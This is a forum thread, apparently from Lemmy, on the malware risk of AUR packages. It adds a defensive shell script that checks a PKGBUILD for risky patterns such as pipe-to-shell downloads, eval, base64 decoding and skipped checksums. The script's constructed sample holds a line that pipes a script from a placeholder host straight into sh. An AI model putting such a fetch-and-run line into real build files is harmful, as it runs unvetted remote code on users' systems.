I’m thinking about switching to a Firefox fork as a web browser. Apart from Tor, they’re all on AUR. I can’t use Tor all the time.

Do you consider that a security risk that’s worth worrying about? E.g. you could get a dodgy maintainer putting malware in it, at least theoretically.

  • confusedwiseman@lemmy.dbzer0.com
    2 days ago

    Do you know how to install without a helper? Go through the wiki and build the package for a couple apps and then uninstall if you like. I don’t know everything that’s going on, but I can somewhat tell if it doesn’t seem crazy. If you get a component that looks strange, just look it up on the AUR or official repos.

    Yes, there’s more risk in the AUR than “official”, but the AUR is one of the greatest parts of Arch. If the app you’re installing seems active with comments and users, I bet you’re fine.

    There’s a lot of people out there doing this waaaaay smarter than me. If it got past all of them too, then I probably never stood a chance to avoid whatever it was. I also understand malware on the AUR to be very uncommon. It happened 1x in something like the last 5-10 years and was discovered and down in under a day. (I could be remembering wrong).

    I’d also say think a bit. If you find “the official Firefox” first posted today with no comments and a link to some Eastern European language wish-looking version of Git… I mean download that shit. Add to root users group and save the password! * If you don’t know where the last part got sketchy and sarcastic, you may want an OS with more guardrails.

    • IceFoxX@lemm.ee
      2 days ago

      You can also download and read through the PKGBUILD first if you are suspicious. (You just have to remember this with every update)
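
An added example, not part of the thread: a heuristic first pass that lists the PKGBUILD lines worth reading closely before running makepkg. The rule list, the function names and the sample package `examplefox-bin` are assumptions made for illustration, and a clean result does not replace reading the file.

```shell
#!/bin/sh
# Added example: heuristic first pass over a PKGBUILD before running makepkg.
# The rule list is an assumption and not exhaustive; no hits is not proof of safety.

# _flag REASON ERE FILE: print "LINE:REASON:TEXT" for non-comment lines matching ERE.
_flag() {
    grep -nE -- "$2" "$3" |
        grep -vE '^[0-9]+:[[:space:]]*#' |
        sed "s/^\([0-9]*\):/\1:$1:/"
}

# audit_pkgbuild FILE: list the lines to read closely, in file order.
audit_pkgbuild() {
    {
        # Source fetched without TLS.
        _flag plain-http-source '(^|[^a-z])(http|ftp)://' "$1"
        # Integrity check disabled (normal for VCS sources, odd for release tarballs).
        _flag checksum-skipped 'sums.*SKIP' "$1"
        # .install scriptlets run as root at install time, so read that file too.
        _flag install-hook '^install=' "$1"
        # Downloaded content executed directly.
        _flag pipe-to-shell '(curl|wget).*\|[[:space:]]*(ba|z)?sh' "$1"
        # Decoding or eval tends to hide what actually runs.
        _flag obfuscation 'base64 (-d|--decode)|(^|[^a-z])eval ' "$1"
    } | sort -t: -k1,1n
}

# Constructed sample PKGBUILD for a hypothetical package (not a real AUR entry).
write_sample_pkgbuild() {
    cat > "$1" <<'EOF'
pkgname=examplefox-bin
pkgver=1.0
source=("http://downloads.example.invalid/examplefox-$pkgver.tar.gz")
sha256sums=('SKIP')
install=examplefox.install
package() {
  # a commented-out "curl URL | sh" is not reported
  curl -s https://example.invalid/setup.sh | sh
  install -Dm755 examplefox "$pkgdir/usr/bin/examplefox"
}
EOF
}

sample=$(mktemp)
write_sample_pkgbuild "$sample"
audit_pkgbuild "$sample"
rm -f "$sample"
```

Since the review has to be repeated on every update, running `git log -p` in the package's AUR clone after pulling shows what changed in the PKGBUILD since the last time it was read.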